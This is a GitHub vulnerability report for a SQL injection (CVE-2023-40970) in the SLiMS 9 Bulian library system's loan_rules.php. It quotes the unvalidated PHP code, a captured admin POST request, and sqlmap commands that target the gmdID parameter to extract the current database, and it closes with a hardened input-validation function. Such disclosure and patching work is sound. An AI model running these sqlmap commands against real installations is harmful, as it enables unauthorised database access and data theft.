CVE-2023-40970: [Security Bugs] SQL Injection at loan_rules.php · Issue #205 · slims/slims9_bulian
Senayan Library Management Systems SLIMS 9 Bulian v 9.6.1 is vulnerable to SQL Injection via admin/modules/circulation/loan_rules.php.
The bug
A SQL Injection exists in admin/modules/circulation/loan_rules.php, in the code below (the values from $_POST reach the query builder without type checking; only the update record ID is cast):

/* RECORD OPERATION */
if (isset($_POST['saveData'])) {
    // all fields are taken straight from the request; at most trim() is applied
    $data['member_type_id'] = $_POST['memberTypeID'];
    $data['coll_type_id'] = $_POST['collTypeID'];
    $data['gmd_id'] = $_POST['gmdID'];
    $data['loan_limit'] = trim($_POST['loanLimit']);
    $data['loan_periode'] = trim($_POST['loanPeriode']);
    $data['reborrow_limit'] = trim($_POST['reborrowLimit']);
    $data['fine_each_day'] = trim($_POST['fineEachDay']);
    $data['grace_periode'] = trim($_POST['gracePeriode']);
    $data['input_date'] = date('Y-m-d');
    $data['last_update'] = date('Y-m-d');
    // create sql op object
    $sql_op = new simbio_dbop($dbs);
    if (isset($_POST['updateRecordID'])) {
        /* UPDATE RECORD MODE */
        // remove input date
        unset($data['input_date']);
        // filter update record ID
        $updateRecordID = (integer)$_POST['updateRecordID'];
        // update the data
        $update = $sql_op->update('mst_loan_rules', $data, 'loan_rules_id='.$updateRecordID);
        if ($update) {
            toastr(__('Loan Rules Successfully Updated'))->success();
            echo '<script language="Javascript">parent.jQuery(\'#mainContent\').simbioAJAX(parent.jQuery.ajaxHistory[0].url);</script>';
        } else {
            toastr(__('Loan Rules FAILED to Updated. Please Contact System Administrator')."\nDEBUG : ".$sql_op->error)->error();
        }
        exit();
    } else {
        /* INSERT RECORD MODE */
        $insert = $sql_op->insert('mst_loan_rules', $data); // BUG HERE
        if ($insert) {
            toastr(__('New Loan Rules Successfully Saved'))->success();
            echo '<script language="Javascript">parent.jQuery(\'#mainContent\').simbioAJAX(\''.$_SERVER['PHP_SELF'].'\');</script>';
        } else {
            toastr(__('Loan Rules FAILED to Save. Please Contact System Administrator')."\n".$sql_op->error)->error();
        }
        exit();
    }
    exit();
}
To Reproduce
Steps to reproduce the behavior:
1. Log in as admin or as a user that has access to circulation.
2. Make sure Burp Suite is on to capture the request, such as the one below.
3. Save the request into a file (example.req).
4. Run the test with sqlmap with the command sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql
5. Voila.
example.req
POST /slims9_bulian-9.6.1/admin/modules/circulation/loan_rules.php?action=detail&ajaxload=1 HTTP/1.1
Host: localhost
Content-Length: 1195
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypqBOyIslkQAaoPCi
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=circulation
Accept-Encoding: gzip, deflate
Accept-Language: id,en-US;q=0.9,en;q=0.8,ru;q=0.7
Cookie: SenayanAdmin=d79m01ubrn9d8cagafoflttg3m; admin_logged_in=1; SenayanMember=q0e3uf77qcmobchek4aciibpul; PHPSESSID=rh1hmcqfrm2a33e96b5lmtujn0
Connection: close
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="csrf_token"
98420c7b2b5656890daf0f80b7756a6bb63fac37cb8ad1ac40a7b3ab4cde54c9
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="form_name"
mainForm
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="memberTypeID"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="collTypeID"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="gmdID"
0
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="loanLimit"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="loanPeriode"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="reborrowLimit"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="fineEachDay"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="gracePeriode"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="saveData"
Save
------WebKitFormBoundarypqBOyIslkQAaoPCi--
Screenshots
Proof of concept: current database
Command to run: sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql --current-db
Versions
- Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86_64)
- Slims Version: slims9_bulian-9.6.1
Notes
Added a comment marking the bug in the code. Last edit at 18 August 2023 21.12 GMT+7
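As an added example (not SLiMS project code), a hardened way to build the $data array for the loan-rule fields shown in "The bug": every value is required to be a plain integer (or a decimal amount for the fine) before it is handed to the insert/update helper, extending the (integer) cast the page already applies to updateRecordID to the rest of the form. Assumptions: the mst_loan_rules columns are numeric as their names suggest, and buildLoanRuleData() is a hypothetical helper name.

```php
<?php
// Added example, not SLiMS code: typed validation of the loan-rule POST fields
// so that $data can only ever carry integers and a decimal fine amount.

/**
 * Build the $data array for mst_loan_rules from a POST-like array.
 * Returns null if any field is missing or is not a valid number.
 */
function buildLoanRuleData(array $post): ?array
{
    // request parameter => table column; all must be non-negative integers
    $intFields = [
        'memberTypeID'  => 'member_type_id',
        'collTypeID'    => 'coll_type_id',
        'gmdID'         => 'gmd_id',
        'loanLimit'     => 'loan_limit',
        'loanPeriode'   => 'loan_periode',
        'reborrowLimit' => 'reborrow_limit',
        'gracePeriode'  => 'grace_periode',
    ];
    $data = [];
    foreach ($intFields as $param => $column) {
        $value = trim((string)($post[$param] ?? ''));
        // ctype_digit() accepts only "0"-"9": no sign, quotes, spaces or comments
        if (!ctype_digit($value)) {
            return null;
        }
        $data[$column] = (int)$value;
    }
    // fine per day: non-negative amount with at most two decimals
    $fine = trim((string)($post['fineEachDay'] ?? ''));
    if (!preg_match('/^\d+(\.\d{1,2})?$/', $fine)) {
        return null;
    }
    $data['fine_each_day'] = $fine;
    $data['input_date']  = date('Y-m-d');
    $data['last_update'] = date('Y-m-d');
    return $data;
}

// Constructed inputs: the first mirrors the captured example.req form fields,
// the second carries a stray quote in gmdID and is refused.
$good = ['memberTypeID' => '1', 'collTypeID' => '1', 'gmdID' => '0', 'loanLimit' => '1',
         'loanPeriode' => '1', 'reborrowLimit' => '1', 'fineEachDay' => '1', 'gracePeriode' => '1'];
$bad = $good;
$bad['gmdID'] = "0'";
var_dump(buildLoanRuleData($good) !== null);
var_dump(buildLoanRuleData($bad) === null);
```

When the function returns null, the handler should stop before calling $sql_op->insert() or $sql_op->update() and report a validation error instead of the database error string.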